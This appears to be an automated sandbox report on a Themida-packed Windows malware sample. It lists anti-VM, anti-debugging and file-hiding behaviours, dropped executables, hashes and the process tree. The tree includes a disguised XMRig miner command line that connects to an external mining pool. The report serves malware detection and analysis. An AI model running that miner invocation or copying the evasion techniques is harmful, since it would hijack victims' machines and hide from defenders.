Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 01:17
Behavioral task
behavioral1
Sample
2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe
Resource
win7-20240221-en
General
-
Target
2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe
-
Size
19.8MB
-
MD5
74595855031cc4eb18b48346f876cd2e
-
SHA1
24bf72be8f93f2da8defe6c47004ecde786458ef
-
SHA256
2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a
-
SHA512
33227d3e36a95fd4b9fcee533997bab9080a735c52417a10114a01d81c15eebcccca1cb99c6cfaf70691fc5149a41f8cffd4ee5fd54e0a593aaeb1ca6438b240
-
SSDEEP
393216:xao4ZbKh+7uRQSn44pfrovhexQ0s0kl1X5+twDyClkzmv7PXVTpa:xaoAW+qpf6hKQJ+tcH6zmv7Xa
Malware Config
Signatures
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
Processes:
2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule C:\ProgramData\WindowsTask\MicrosoftHost.exe family_xmrig C:\ProgramData\WindowsTask\MicrosoftHost.exe xmrig -
Detects executables packed with Themida 46 IoCs
Processes:
resource yara_rule behavioral2/memory/996-0-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/996-2-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/996-3-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/996-4-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/996-5-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/996-6-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/996-7-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/996-8-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/996-9-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/996-15-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/996-34-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida C:\ProgramData\WindowsTask\audiodg.exe INDICATOR_EXE_Packed_Themida behavioral2/memory/996-44-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/408-46-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/408-49-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/408-47-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/408-48-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/408-51-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/408-50-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/408-52-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/408-53-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/996-54-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/408-57-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/996-65-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/408-71-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/996-74-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/408-78-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/408-79-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/996-81-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/408-84-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/996-86-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/408-89-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/996-92-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/408-94-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/996-96-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/408-100-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/996-102-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/408-105-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/996-107-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/408-110-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/996-113-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/408-115-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/996-117-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/408-121-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/996-123-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp INDICATOR_EXE_Packed_Themida behavioral2/memory/408-126-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp INDICATOR_EXE_Packed_Themida -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exeaudiodg.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ audiodg.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exeaudiodg.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion audiodg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion audiodg.exe -
Executes dropped EXE 3 IoCs
Processes:
Packs.exeaudiodg.exeMicrosoftHost.exepid process 2740 Packs.exe 408 audiodg.exe 64 MicrosoftHost.exe -
Processes:
resource yara_rule behavioral2/memory/996-0-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/996-2-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/996-3-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/996-4-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/996-5-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/996-6-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/996-7-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/996-8-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/996-9-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/996-15-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/996-34-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida C:\ProgramData\WindowsTask\audiodg.exe themida behavioral2/memory/996-44-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/408-46-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp themida behavioral2/memory/408-49-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp themida behavioral2/memory/408-47-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp themida behavioral2/memory/408-48-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp themida behavioral2/memory/408-51-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp themida behavioral2/memory/408-50-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp themida behavioral2/memory/408-52-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp themida behavioral2/memory/408-53-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp themida behavioral2/memory/996-54-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/408-57-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp themida behavioral2/memory/996-65-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/408-71-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp themida behavioral2/memory/996-74-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/408-78-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp themida behavioral2/memory/408-79-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp themida behavioral2/memory/996-81-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/408-84-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp themida behavioral2/memory/996-86-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/408-89-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp themida behavioral2/memory/996-92-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/408-94-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp themida behavioral2/memory/996-96-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/408-100-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp themida behavioral2/memory/996-102-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/408-105-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp themida behavioral2/memory/996-107-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/408-110-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp themida behavioral2/memory/996-113-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/408-115-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp themida behavioral2/memory/996-117-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/408-121-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp themida behavioral2/memory/996-123-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp themida behavioral2/memory/408-126-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp themida -
Processes:
2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exeaudiodg.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA audiodg.exe -
AutoIT Executable 41 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral2/memory/996-3-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp autoit_exe behavioral2/memory/996-4-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp autoit_exe behavioral2/memory/996-5-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp autoit_exe behavioral2/memory/996-6-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp autoit_exe behavioral2/memory/996-7-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp autoit_exe behavioral2/memory/996-8-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp autoit_exe behavioral2/memory/996-9-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp autoit_exe behavioral2/memory/996-15-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp autoit_exe behavioral2/memory/996-34-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp autoit_exe behavioral2/memory/996-44-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp autoit_exe behavioral2/memory/408-49-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp autoit_exe behavioral2/memory/408-48-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp autoit_exe behavioral2/memory/408-51-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp autoit_exe behavioral2/memory/408-50-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp autoit_exe behavioral2/memory/408-52-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp autoit_exe behavioral2/memory/408-53-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp autoit_exe behavioral2/memory/996-54-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp autoit_exe behavioral2/memory/408-57-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp autoit_exe behavioral2/memory/996-65-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp autoit_exe behavioral2/memory/408-71-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp autoit_exe behavioral2/memory/996-74-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp autoit_exe behavioral2/memory/408-78-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp autoit_exe behavioral2/memory/408-79-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp autoit_exe behavioral2/memory/996-81-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp autoit_exe behavioral2/memory/408-84-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp autoit_exe behavioral2/memory/996-86-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp autoit_exe behavioral2/memory/408-89-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp autoit_exe behavioral2/memory/996-92-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp autoit_exe behavioral2/memory/408-94-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp autoit_exe behavioral2/memory/996-96-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp autoit_exe behavioral2/memory/408-100-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp autoit_exe behavioral2/memory/996-102-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp autoit_exe behavioral2/memory/408-105-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp autoit_exe behavioral2/memory/996-107-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp autoit_exe behavioral2/memory/408-110-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp autoit_exe behavioral2/memory/996-113-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp autoit_exe behavioral2/memory/408-115-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp autoit_exe behavioral2/memory/996-117-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp autoit_exe behavioral2/memory/408-121-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp autoit_exe behavioral2/memory/996-123-0x00007FF602AF0000-0x00007FF60479F000-memory.dmp autoit_exe behavioral2/memory/408-126-0x00007FF639730000-0x00007FF63A5FB000-memory.dmp autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exeaudiodg.exepid process 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 408 audiodg.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 3080 ipconfig.exe -
NTFS ADS 2 IoCs
Processes:
2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Local\Temp\winmgmts:\localhost\root\CIMV2 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\winmgmts:\localhost\ 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exepid process 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exepid process 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
MicrosoftHost.exedescription pid process Token: SeLockMemoryPrivilege 64 MicrosoftHost.exe Token: SeLockMemoryPrivilege 64 MicrosoftHost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
MicrosoftHost.exepid process 64 MicrosoftHost.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.execmd.execmd.exedescription pid process target process PID 996 wrote to memory of 1908 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe cmd.exe PID 996 wrote to memory of 1908 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe cmd.exe PID 1908 wrote to memory of 3080 1908 cmd.exe ipconfig.exe PID 1908 wrote to memory of 3080 1908 cmd.exe ipconfig.exe PID 996 wrote to memory of 3648 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe cmd.exe PID 996 wrote to memory of 3648 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe cmd.exe PID 3648 wrote to memory of 4244 3648 cmd.exe gpupdate.exe PID 3648 wrote to memory of 4244 3648 cmd.exe gpupdate.exe PID 996 wrote to memory of 2740 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe Packs.exe PID 996 wrote to memory of 2740 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe Packs.exe PID 996 wrote to memory of 2740 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe Packs.exe PID 996 wrote to memory of 408 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe audiodg.exe PID 996 wrote to memory of 408 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe audiodg.exe PID 996 wrote to memory of 64 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe MicrosoftHost.exe PID 996 wrote to memory of 64 996 2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe MicrosoftHost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe"C:\Users\Admin\AppData\Local\Temp\2ea5e2feaf74e9ea6d7760ae2a20742a8861157607584e566e32b1ba329d378a.exe"1⤵
- Modifies visiblity of hidden/system files in Explorer
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:996 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns2⤵
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\system32\ipconfig.exeipconfig /flushdns3⤵
- Gathers network information
PID:3080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force2⤵
- Suspicious use of WriteProcessMemory
PID:3648 -
C:\Windows\system32\gpupdate.exegpupdate /force3⤵PID:4244
-
-
-
C:\ProgramData\Setup\Packs.exeC:\ProgramData\Setup\Packs.exe -ppidar2⤵
- Executes dropped EXE
PID:2740
-
-
C:\ProgramData\WindowsTask\audiodg.exeC:\ProgramData\WindowsTask\audiodg.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:408
-
-
C:\ProgramData\WindowsTask\MicrosoftHost.exeC:\ProgramData\WindowsTask\MicrosoftHost.exe -o stratum+tcp://185.139.69.167:3333 -u RandomX_CPU --donate-level=1 -k --cpu-priority=0 -t42⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:64
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.2MB
MD51ee4321c311d7e58208c61630fa3f278
SHA167ef36cf785ec0d4602eb35a98c23420beba2e2a
SHA256463ce847b6f7b32d1f4f49dfaaa2ce4a1061b6dfca1fb6a1bf39f7f40117266d
SHA512f0bbf219926d7316bce936e4c362f2b5195420b7ee14538dd61d8a362921351cdde80705fcff8249773284a10067149f5a60291fa965aaaaca65fc535a5a8ffd
-
Filesize
14KB
MD50c0195c48b6b8582fa6f6373032118da
SHA1d25340ae8e92a6d29f599fef426a2bc1b5217299
SHA25611bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5
SHA512ab28e99659f219fec553155a0810de90f0c5b07dc9b66bda86d7686499fb0ec5fddeb7cd7a3c5b77dccb5e865f2715c2d81f4d40df4431c92ac7860c7e01720d
